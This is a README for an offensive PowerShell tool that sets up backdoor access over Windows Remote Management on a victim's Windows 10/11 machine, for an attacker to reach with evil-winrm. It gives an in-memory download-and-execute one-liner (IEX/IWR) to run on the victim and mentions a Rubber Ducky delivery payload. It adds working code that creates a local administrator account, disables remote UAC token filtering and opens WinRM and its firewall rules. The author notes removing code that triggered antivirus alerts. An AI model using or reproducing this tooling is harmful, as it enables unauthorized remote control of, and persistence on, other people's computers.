This repository provides a PowerShell script that sets up a "reverse shell" over Windows Remote Management (WinRM) on Windows 10/11: the script prepares the victim (it creates a local user account and exposes WinRM), and the attacker then connects to that machine with evil-winrm. Additionally it includes a Rubber Ducky payload for alternative deployment.

I removed the hide-windows function, which was triggering the AV alert.
- Both attacker and victim must be on the same network for the connection to be established successfully: the attacker has to reach the WinRM listener on the victim (TCP port 5985 by default for HTTP).
- Ensure you have administrative access to the target machine; the script changes local accounts, services and firewall rules.
- Edit `WinRM.ps1`: set your desired username and password by modifying the variables `$Username` and `$Password`.
- Run the following PowerShell one-liner on the victim machine with administrative privileges (it downloads and executes the script in memory):

```powershell
IEX (IWR "https://raw.githubusercontent.com/VBV11/WinRM-Reverse-Shell/main/WinRM.ps1")
```

- From the attacker machine, connect with evil-winrm. `-i` takes the victim's IP address, so replace `YOUR.IP.ADDRESS` with it, and replace `Admin` / `Password1` with the username and password you set in the script:

```bash
evil-winrm -i YOUR.IP.ADDRESS -u Admin -p Password1
```
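The following PowerShell is an added example written for this page, not the repository's `WinRM.ps1` (whose contents may differ). It shows the kind of changes the target side needs before evil-winrm can log in (create the local account, make it an administrator, enable the WinRM listener and firewall rules), plus a check you can run afterwards to confirm the listener and the account are in place, and a cleanup function for the end of an engagement. The function names, the `LocalAccountTokenFilterPolicy` step and the firewall handling are assumptions of this example, not something the repository states it does.

```powershell
# Added example: a stand-in for the target-side setup a script like WinRM.ps1
# has to perform. Function names, the LocalAccountTokenFilterPolicy step and the
# firewall handling are assumptions, not the repository's code.
# Run in an elevated PowerShell on the target (Windows 10/11).

function Enable-WinRMAccess {
    param(
        [Parameter(Mandatory)] [string] $Username,
        [Parameter(Mandatory)] [string] $Password
    )

    $secure = ConvertTo-SecureString $Password -AsPlainText -Force

    # 1. Local account that evil-winrm will authenticate as.
    if (-not (Get-LocalUser -Name $Username -ErrorAction SilentlyContinue)) {
        New-LocalUser -Name $Username -Password $secure `
            -PasswordNeverExpires -AccountNeverExpires | Out-Null
    }

    # 2. Make it a local administrator. The group is addressed by its
    #    well-known SID so this also works on non-English installs.
    $adminSid = 'S-1-5-32-544'
    $members  = Get-LocalGroupMember -SID $adminSid | ForEach-Object { $_.Name }
    if ($members -notcontains "$env:COMPUTERNAME\$Username") {
        Add-LocalGroupMember -SID $adminSid -Member $Username
    }

    # 3. Remote UAC filters the token of local admins other than the built-in
    #    Administrator; without this value the remote session is not elevated.
    Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' `
        -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord

    # 4. WinRM service, HTTP listener on 5985 and the matching firewall rules.
    #    -SkipNetworkProfileCheck keeps this working on "Public" networks.
    Enable-PSRemoting -Force -SkipNetworkProfileCheck | Out-Null
    Set-Service -Name WinRM -StartupType Automatic
    Start-Service -Name WinRM
    Enable-NetFirewallRule -DisplayGroup 'Windows Remote Management'
}

function Test-WinRMAccess {
    # Check from the target side that everything evil-winrm needs is in place.
    param([Parameter(Mandatory)] [string] $Username)

    $user      = Get-LocalUser -Name $Username -ErrorAction SilentlyContinue
    $admins    = Get-LocalGroupMember -SID 'S-1-5-32-544' | ForEach-Object { $_.Name }
    $listening = [bool](Get-NetTCPConnection -State Listen -LocalPort 5985 -ErrorAction SilentlyContinue)
    $listeners = Get-ChildItem WSMan:\localhost\Listener -ErrorAction SilentlyContinue
    $fwRules   = Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' -Enabled True -ErrorAction SilentlyContinue

    [pscustomobject]@{
        UserExists    = [bool]$user
        UserEnabled   = [bool]($user -and $user.Enabled)
        IsLocalAdmin  = $admins -contains "$env:COMPUTERNAME\$Username"
        Port5985Open  = $listening
        ListenerCount = @($listeners).Count
        FirewallOn    = [bool]$fwRules
    }
}

function Remove-WinRMAccess {
    # Undo the changes when the engagement is over: the account shows up in
    # netplwiz and on the login screen, so do not leave it behind.
    param([Parameter(Mandatory)] [string] $Username)

    Remove-LocalUser -Name $Username -ErrorAction SilentlyContinue
    Disable-PSRemoting -Force
    Disable-NetFirewallRule -DisplayGroup 'Windows Remote Management'
    Stop-Service -Name WinRM
    Set-Service -Name WinRM -StartupType Manual
    Remove-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' `
        -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue
}

# Usage on the target; afterwards connect from the attacker with
#   evil-winrm -i <target-ip> -u Admin -p Password1
Enable-WinRMAccess -Username 'Admin' -Password 'Password1'
Test-WinRMAccess -Username 'Admin'
```

`Test-WinRMAccess` returns an object whose fields should all be true (and `ListenerCount` at least 1) before you try evil-winrm; if `Port5985Open` is false, the WinRM service or the network profile is usually the culprit. `Remove-WinRMAccess` reverses every step so the account in the next section is not left on the machine.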
The repository includes a Rubber Ducky payload for alternative deployment. Edit the payload speed and URL as needed.
Demo video: `WinRM.mp4`
The created user account can be viewed in User Accounts: type `netplwiz` in the Run box to open it (running `net user` in a console lists the account as well).
- The account may also be visible on the login screen, so expect it to be noticed on a shared or monitored machine.